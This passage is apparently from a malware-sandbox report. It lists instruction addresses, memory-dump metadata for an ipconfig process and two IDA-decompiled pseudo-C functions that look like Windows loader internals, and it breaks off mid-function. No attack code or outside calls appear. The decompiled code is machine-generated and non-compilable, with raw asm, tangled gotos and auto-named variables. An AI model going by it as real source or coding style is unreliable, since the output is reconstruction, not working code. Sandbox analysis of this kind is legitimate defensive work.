              0x02eb4247
              0x02eb4247
              0x02eb4249
              0x02eb4249
              0x02eb4249
              0x02eb4251
              0x02eb4251
              0x02eb4257
              0x02eb425f
              0x02eb426e
              0x02eb4270
              0x02eb427a
              0x02efe219
              0x02efe219
              0x02eb4280
              0x02eb4282
              0x02eb4456
              0x02eb45ea
              0x00000000
              0x02eb45f0
              0x02efe223
              0x00000000
              0x02efe223
              0x02eb445c
              0x02eb445c
              0x00000000
              0x02eb445c
              0x00000000
              0x02eb4288
              0x02eb428c
              0x02efe298
              0x02eb4292
              0x02eb4292
              0x02eb429e
              0x02eb42a3
              0x02eb42a7
              0x02eb42ac
              0x02efe22d
              0x02eb42b2
              0x02eb42b2
              0x02eb42b9
              0x02eb42bc
              0x02eb42c2
              0x02eb42ca
              0x02eb42cd
              0x02eb42cd
              0x02eb42d4
              0x02eb433f
              0x02eb433f
              0x02eb42d6
              0x02eb42d6
              0x02eb42d9
              0x02eb42dd
              0x02eb42eb
              0x02efe23a
              0x02eb42f1
              0x02eb4305
              0x02eb430d
              0x02eb4315
              0x02eb4318
              0x02eb431f
              0x02eb4322
              0x02eb432e
              0x02eb433b
              0x02eb433b
              0x00000000
              0x02eb432e
              0x02eb42eb
              0x02eb434c
              0x02eb434e
              0x02eb4352
              0x02eb4359
              0x02eb435e
              0x02eb4361
              0x02eb436e
              0x02eb438a
              0x02eb438e
              0x02eb4396
              0x02eb439e
              0x02eb43a1
              0x02eb43ad
              0x02eb43bb
              0x02eb43bb
              0x02eb43ad
              0x02eb436e
              0x02eb43bf
              0x02eb43c5
              0x02eb4463
              0x02eb4463
              0x02eb43ce
              0x02eb43d5
              0x02eb43d9
              0x02eb43df
              0x02eb4475
              0x02eb4479
              0x02eb4491
              0x02eb4491
              0x02eb4479
              0x02eb43e5
              0x02eb43eb
              0x02eb43f4
              0x02eb43f6
              0x02eb43f9
              0x02eb43fc
              0x02eb43ff
              0x02eb44e8
              0x02eb44ed
              0x02eb44f3
              0x02efe247
              0x00000000
              0x02eb44f9
              0x02eb4504
              0x02eb4508
              0x02eb450f
              0x02efe269
              0x00000000
              0x02eb4515
              0x02eb4519
              0x02eb4531
              0x02eb4534
              0x02eb4537
              0x02eb453e
              0x02eb4541
              0x02eb454a
              0x02efe255
              0x02efe255
              0x02efe25b
              0x02efe25e
              0x02efe261
              0x02efe261
              0x02eb4555
              0x02eb4559
              0x02eb455d
              0x02efe26d
              0x02efe270
              0x02efe274
              0x02efe27a
              0x02efe27d
              0x02efe28e
              0x02efe28e
              0x02eb4563
              0x02eb4563
              0x02eb4569
              0x02eb4569
              0x00000000
              0x02eb455d
              0x02eb450f
              0x00000000
              0x02eb44f3
              0x02eb43ff
              0x02eb4405
              0x02eb4405
              0x02eb4405
              0x02eb42ac
              0x02eb428c
              0x02eb4282
              0x02eb4407
              0x02eb440d
              0x02efe2af
              0x02efe2af
              0x02eb4413
              0x02eb4413
              0x00000000
              0x02eb41d4
              0x00000000
              0x02eb41c3
              0x02eb41bd
              0x02eb4415
              0x02eb4415
              0x02eb4416
              0x02eb4417
              0x02eb4429
              0x02eb416e
              0x02eb416e
              0x02eb4175
              0x02eb4498
              0x02eb449f
              0x02efe12d
              0x00000000
              0x02efe133
              0x00000000
              0x02efe133
              0x02eb44a5
              0x02eb44a5
              0x02eb44aa
              0x00000000
              0x02eb44bb
              0x02eb44ca
              0x02eb44d6
              0x02eb44d7
              0x02eb44d8
              0x02eb44e3
              0x02eb44e3
              0x02eb44aa
              0x02eb417b
              0x02eb417b
              0x02eb417b
              0x00000000
              0x02eb417b
              0x02eb4175
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 370acf892b68a564d1f8fb5814d2ff29f7517e044b4d5485285ec76cc61ddca8
              • Instruction ID: 8826226239ac9f4df30158764ebc8698fa97fe3c56e58dd7c46f28a240745bd5
              • Opcode Fuzzy Hash: 370acf892b68a564d1f8fb5814d2ff29f7517e044b4d5485285ec76cc61ddca8
              • Instruction Fuzzy Hash: 6AF16E705482118FC765CF19C490ABBB7E1EF88708F18A92EF58ACB2A1E734D955CB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EC20A0 Relevance: .4, Instructions: 420COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 92%
              			E02EC20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x2f88714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E02EC2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E02EC2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E02E958EC(_t240);
									_t221 =  *0x2f85cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x2f85cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E02ED4A2C(0x2f86e40, 0x2ed4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E02EB7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x2e75c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E02ECF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E02ECF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E02F17016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L02EB2400(_t267 + 0x20);
															}
															L02EB2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E02EC2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E02EB2280(_t134, 0x2f88608);
									__eflags =  *0x2f86e48 - _t253; // 0x408870
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E02EAFFB0(_t198, _t241, 0x2f88608);
										__eflags = _t253;
										if(_t253 != 0) {
											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x2f86e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x2f88608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E02EC6B90(_t210,  &_v64);
										_t262 =  *0x2f88608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E02ECE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E02ED97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E02ED006A(0x2f88608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x2f88608);
												E02EDB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x2f86904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x2f86e48; // 0x408870
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E02EAFFB0(_t198, _t240, 0x2f88608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E02ED00C2(0x2f88608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































              0x02ec20a0
              0x02ec20a8
              0x02ec20ad
              0x02ec20b3
              0x02ec20b8
              0x02ec20c2
              0x02ec20c7
              0x02ec20cb
              0x02ec20d2
              0x02ec2263
              0x02ec2266
              0x02f05836
              0x02f05836
              0x00000000
              0x02ec226c
              0x02ec226c
              0x02ec2270
              0x02ec2274
              0x02ec20e2
              0x02ec20e2
              0x02ec20e6
              0x02ec20ee
              0x02f057dc
              0x02f057de
              0x02f057ec
              0x02f057ec
              0x02f057f1
              0x02f057f3
              0x02f057f8
              0x00000000
              0x02f057f8
              0x02f057e0
              0x02f057e4
              0x02f057ea
              0x00000000
              0x00000000
              0x00000000
              0x02f057ea
              0x02ec20f4
              0x02ec20f4
              0x02ec20f8
              0x02ec20f8
              0x02ec20fc
              0x02ec2100
              0x02ec2106
              0x02ec2201
              0x02ec2206
              0x02ec220b
              0x02ec220e
              0x02ec22a9
              0x02ec22ac
              0x00000000
              0x00000000
              0x02ec22b2
              0x02ec22b5
              0x02f05801
              0x02f05806
              0x00000000
              0x00000000
              0x02f05810
              0x02f05815
              0x02f05818
              0x00000000
              0x00000000
              0x02f0581e
              0x02ec22bb
              0x02ec22bb
              0x02ec2218
              0x02ec2218
              0x02ec221c
              0x02ec2220
              0x02ec2222
              0x02ec22c2
              0x02ec22c4
              0x02ec22dc
              0x02ec22dc
              0x02ec22e1
              0x00000000
              0x00000000
              0x00000000
              0x02ec22e7
              0x02ec22c8
              0x02ec22cd
              0x02ec22d3
              0x02ec22d6
              0x02f05823
              0x02f05825
              0x02f05827
              0x00000000
              0x00000000
              0x02f0582d
              0x00000000
              0x02f0582d
              0x00000000
              0x02ec2228
              0x02ec2228
              0x00000000
              0x02ec2228
              0x02ec2222
              0x02ec2214
              0x02ec2214
              0x00000000
              0x02ec2114
              0x02ec2114
              0x02ec2114
              0x02ec211a
              0x02ec211c
              0x02ec2348
              0x02ec234d
              0x02f05840
              0x02f05845
              0x02f05848
              0x02f0584e
              0x02f0584e
              0x02f05848
              0x02ec2353
              0x02ec2355
              0x02ec2388
              0x02ec2388
              0x02ec2368
              0x02ec236a
              0x02ec236c
              0x02ec238f
              0x00000000
              0x02ec236e
              0x02ec236e
              0x02ec218e
              0x02ec218e
              0x02ec2191
              0x02ec2195
              0x02f05a03
              0x02f05a06
              0x02f05a0c
              0x02f05a0f
              0x02f05a11
              0x02f05a13
              0x02f05a13
              0x02f05a19
              0x02f05a1f
              0x00000000
              0x02ec219b
              0x02ec219b
              0x02ec21a0
              0x02ec2282
              0x02ec2284
              0x02ec2284
              0x02ec2284
              0x02ec2284
              0x02ec21a6
              0x02ec21a9
              0x02ec21ac
              0x02ec21ae
              0x02ec21b3
              0x02ec228b
              0x02ec2290
              0x02ec2379
              0x02ec2296
              0x02ec2298
              0x02ec2298
              0x02ec2290
              0x02ec21b9
              0x02ec21be
              0x02ec22a2
              0x02ec22a2
              0x02ec21c4
              0x02ec21c8
              0x02ec21cc
              0x02ec21d0
              0x02ec21d4
              0x02ec21de
              0x02ec21e3
              0x02f05a29
              0x02f05a2c
              0x00000000
              0x00000000
              0x02f05a3b
              0x00000000
              0x02ec21e9
              0x02ec21e9
              0x02ec21e9
              0x02ec21ee
              0x02ec21f1
              0x02f05a45
              0x02f05a4b
              0x02f05a52
              0x02f05a58
              0x02f05a5d
              0x02f05a5f
              0x02f05a71
              0x02f05a61
              0x02f05a6a
              0x02f05a6a
              0x02f05a76
              0x02f05a79
              0x02f05a7f
              0x02f05a83
              0x02f05a85
              0x02f05a87
              0x02f05a87
              0x02f05a8c
              0x02f05a91
              0x02f05a97
              0x02f05a9f
              0x02f05aa0
              0x02f05aa1
              0x02f05aa6
              0x02f05aab
              0x02f05ab1
              0x02f05ab3
              0x02f05ab9
              0x02f05aca
              0x02f05ad4
              0x02f05ad4
              0x02f05ade
              0x02f05ade
              0x02f05aab
              0x02f05a79
              0x02f05a52
              0x02ec21f7
              0x02ec21f9
              0x02ec21fe
              0x02ec21fe
              0x02ec21e3
              0x02ec2195
              0x02ec236c
              0x02ec2122
              0x02ec2122
              0x02ec2124
              0x02ec2231
              0x02ec2236
              0x02ec2236
              0x02ec2238
              0x02ec2238
              0x02ec2240
              0x02ec2242
              0x02ec2244
              0x02f059fc
              0x02ec218c
              0x02ec218c
              0x00000000
              0x02ec218c
              0x02ec224a
              0x02ec224f
              0x02ec2256
              0x02ec2304
              0x02ec2309
              0x02ec230f
              0x02ec231e
              0x02ec231e
              0x02ec231e
              0x02ec2320
              0x02ec2325
              0x02ec232a
              0x02ec232c
              0x02ec233e
              0x02ec233e
              0x00000000
              0x02ec232c
              0x02ec2311
              0x02ec2317
              0x02ec231a
              0x02ec231c
              0x02ec2380
              0x02ec2380
              0x02ec2380
              0x02ec2384
              0x00000000
              0x00000000
              0x02ec2386
              0x00000000
              0x02ec231c
              0x02ec225c
              0x02ec225c
              0x00000000
              0x02ec225c
              0x02ec212a
              0x02ec2134
              0x02ec2138
              0x02ec213d
              0x02f05858
              0x02f05863
              0x02f05863
              0x02f05867
              0x02f0586a
              0x00000000
              0x00000000
              0x02f0586c
              0x02f0586c
              0x02f05871
              0x02f05875
              0x02f05877
              0x02f05997
              0x02f0599c
              0x02f059a1
              0x02f059a7
              0x02f059a7
              0x00000000
              0x02f059a7
              0x02f0587d
              0x00000000
              0x02f0588b
              0x02f0588b
              0x02f05890
              0x02f05892
              0x02f05894
              0x02f05899
              0x02f0589b
              0x02f058a0
              0x02f058a0
              0x02f058aa
              0x02f058b2
              0x02f058b6
              0x02f058be
              0x02f058c6
              0x02f058c9
              0x02f0590d
              0x02f05917
              0x02f0591a
              0x02f0591c
              0x02f05920
              0x02f05928
              0x02f0592a
              0x02f0592c
              0x02f0592e
              0x02f0592e
              0x02f058cb
              0x02f058cd
              0x02f058d8
              0x02f058e0
              0x02f058f4
              0x02f058fe
              0x02f058fe
              0x02f0593a
              0x02f0593e
              0x02f05940
              0x02f05942
              0x00000000
              0x02f05944
              0x02f05944
              0x02f05949
              0x02f0594e
              0x02f0594e
              0x02f05953
              0x02f0595b
              0x02f05976
              0x02f05976
              0x02f0597a
              0x02f0597f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02f05981
              0x02f05981
              0x02f05981
              0x02f05983
              0x02f05988
              0x02f0598d
              0x02f05991
              0x02f05991
              0x00000000
              0x02f0595d
              0x02f0595d
              0x02f05963
              0x02f05965
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02f05967
              0x02f05967
              0x02f0596b
              0x02f0596d
              0x00000000
              0x00000000
              0x02f0596f
              0x02f05971
              0x02f05971
              0x02f05974
              0x00000000
              0x00000000
              0x00000000
              0x02f05974
              0x00000000
              0x02f05967
              0x02f0595b
              0x02f05942
              0x02f05863
              0x02ec2143
              0x02ec2143
              0x02ec2149
              0x02ec214f
              0x02ec22ec
              0x02ec22f1
              0x02ec22f6
              0x00000000
              0x02ec22f6
              0x02ec2159
              0x02ec2173
              0x02ec2173
              0x02ec217d
              0x02ec2181
              0x02ec2186
              0x02f059ae
              0x02f059b2
              0x02f059b5
              0x02f059b7
              0x02f059ba
              0x02f059cd
              0x02f059d1
              0x02f059d5
              0x02f059d9
              0x02f059db
              0x00000000
              0x00000000
              0x02f059dd
              0x02f059dd
              0x02f059e1
              0x02f059e4
              0x02f059e7
              0x02f059ee
              0x02f059ee
              0x02f059f3
              0x02f059f3
              0x00000000
              0x02ec2186
              0x02ec2164
              0x02ec216d
              0x00000000
              0x00000000
              0x00000000
              0x02ec216d
              0x02ec2106
              0x02ec2266
              0x02ec20d8
              0x02ec20da
              0x02ec20e0
              0x00000000
              0x00000000
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4840e402d36365dffb039e369880eaf2b443e50c79a46701eb36c2b75358a9ba
              • Instruction ID: 92e3086d7a8aa763224d4d147c4683598c2d126d5e19c594cbed42d458db14aa
              • Opcode Fuzzy Hash: 4840e402d36365dffb039e369880eaf2b443e50c79a46701eb36c2b75358a9ba
              • Instruction Fuzzy Hash: BBF10431A483019FDB25CB68C98076AB7E1BF85398F14D51DEE999B380D774D842CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EAD5E0 Relevance: .4, Instructions: 353COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 87%
              			E02EAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x2f8d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E02EA6600(0x2f852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x2f87b9c; // 0x0
							_t281 = L02EB4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E02EDF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x2f87b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x2f87b8c; // 0x402a08
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x402ab8
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E02EB2280(_t200, 0x2f884d8);
									_t277 =  *0x2f885f4; // 0x402ef8
									_t351 =  *0x2f885f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75130000
										_t337 =  *_t21;
